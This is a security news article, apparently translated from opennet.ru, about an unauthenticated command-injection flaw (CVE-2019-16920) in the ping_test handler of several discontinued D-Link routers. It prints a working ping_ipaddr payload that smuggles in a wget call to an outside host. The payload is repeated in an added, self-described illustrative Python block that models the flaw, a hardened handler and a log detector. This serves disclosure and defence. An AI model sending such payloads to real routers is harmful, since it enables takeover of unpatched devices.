Remotely exploitable vulnerability in D-Link routers

A dangerous vulnerability (CVE-2019-16920) has been identified in D-Link wireless routers. It allows remote code execution on the device by sending a specially crafted request to the "ping_test" handler, which is reachable without authentication.

Interestingly, according to the firmware developers, the "ping_test" call is only supposed to be made after authentication, but in practice it is invoked in any case, regardless of whether the user has logged in to the web interface. Specifically, when the apply_sec.cgi script is accessed with the parameter "action=ping_test", the script redirects to the login page, but at the same time it carries out the action associated with ping_test. To execute code, a second flaw in ping_test itself is used: it invokes the ping utility without properly checking that the address passed in for testing is a valid IP address. For example, to run the wget utility and pass the output of the command "echo 1234" to an external host, it is enough to supply the parameter "ping_ipaddr=127.0.0.1%0awget%20-P%20/tmp/%20http://test.test/?$(echo 1234)". Here %0a is a URL-encoded newline, so everything after the address is run by the shell as a second command.
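The following Python block is an added example, not code from the original article or from D-Link's firmware. It models the two defects described above for the apply_sec.cgi ping_test handler (no authentication check, and ping_ipaddr pasted into a shell command unchecked), shows the checks that would have blocked the published payload, and includes a detection function for web server request paths. The handler names, the ping command template and the sample request paths are assumptions constructed for illustration; the only facts taken from the article are the script name, the two parameters and the %0a payload.

```python
"""Added example, not code from the original article or from D-Link's firmware.
Models the ping_test defects the article describes and the checks that would
have stopped the published payload. Handler names, the ping command template
and the sample request paths are assumptions constructed for illustration."""
import ipaddress
from urllib.parse import parse_qs, urlsplit

# Constructed request paths: the article's payload in URL-encoded form, and a
# legitimate use of the same handler.
SAMPLE_ATTACK = ("/apply_sec.cgi?action=ping_test&ping_ipaddr="
                 "127.0.0.1%0awget%20-P%20/tmp/%20http://test.test/?$(echo%201234)")
SAMPLE_BENIGN = "/apply_sec.cgi?action=ping_test&ping_ipaddr=192.168.0.1"


def vulnerable_ping_command(ping_ipaddr: str) -> str:
    """Assumed shape of the unfixed handler: the decoded parameter is
    interpolated into a shell command line with no validation. Returns the
    line the shell would receive; nothing is executed here."""
    return f"ping -c 1 {ping_ipaddr}"


def shell_commands(command_line: str) -> list[str]:
    """Split a command line on newline and ';', the separators an attacker
    can smuggle in as %0a or %3b. More than one element means a second
    command would run alongside ping."""
    return [c.strip() for c in command_line.replace(";", "\n").split("\n") if c.strip()]


def hardened_ping_argv(ping_ipaddr: str, authenticated: bool) -> list[str]:
    """Fixed handler: refuse unauthenticated callers, accept only a strict IP
    literal, and pass it as its own argv element so no shell is involved."""
    if not authenticated:
        raise PermissionError("ping_test requires an authenticated session")
    try:
        addr = ipaddress.ip_address(ping_ipaddr)  # rejects any trailing text
    except ValueError:
        raise ValueError(f"ping_ipaddr is not an IP address: {ping_ipaddr!r}") from None
    return ["ping", "-c", "1", str(addr)]


def is_ping_test_injection(request_path: str) -> bool:
    """Detection: True for a request to apply_sec.cgi with action=ping_test
    whose ping_ipaddr is anything other than a bare IP literal."""
    parts = urlsplit(request_path)
    if not parts.path.endswith("/apply_sec.cgi"):
        return False
    params = parse_qs(parts.query, keep_blank_values=True)
    if params.get("action") != ["ping_test"]:
        return False
    for value in params.get("ping_ipaddr", []):
        try:
            ipaddress.ip_address(value)
        except ValueError:
            return True
    return False


if __name__ == "__main__":
    decoded = parse_qs(urlsplit(SAMPLE_ATTACK).query)["ping_ipaddr"][0]
    for cmd in shell_commands(vulnerable_ping_command(decoded)):
        print("vulnerable handler would run:", cmd)
    print("attack detected:", is_ping_test_injection(SAMPLE_ATTACK))
    print("benign detected:", is_ping_test_injection(SAMPLE_BENIGN))
    print("hardened argv:", hardened_ping_argv("192.168.0.1", authenticated=True))
```

Run it directly to see the two commands the unfixed handler would hand to the shell for the published payload, and that the same input is rejected by the hardened path and flagged by the detector. The detection function can be pointed at the request column of an access log; because it treats any non-IP value as suspicious rather than matching the specific wget payload, it also catches variants that use a different separator or a different second command.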


The vulnerability has been officially confirmed in the following models:

  • DIR-655 with firmware 3.02b05 or later;
  • DIR-866L with firmware 1.03b04 or later;
  • DIR-1565 with firmware 1.01 or later;
  • DIR-652 (no information on the affected firmware versions has been provided)

Support for these models has already ended, so D-Link has stated that it will not release updates to remove the vulnerability, does not recommend using them and advises replacing them with new devices. As a workaround, access to the web interface can be restricted to trusted IP addresses only.

It was later found that the vulnerability also affects the DIR-855L, DAP-1533, DIR-862L, DIR-615, DIR-835 and DIR-825 models, for which plans to release updates are currently unknown.

Source: opennet.ru
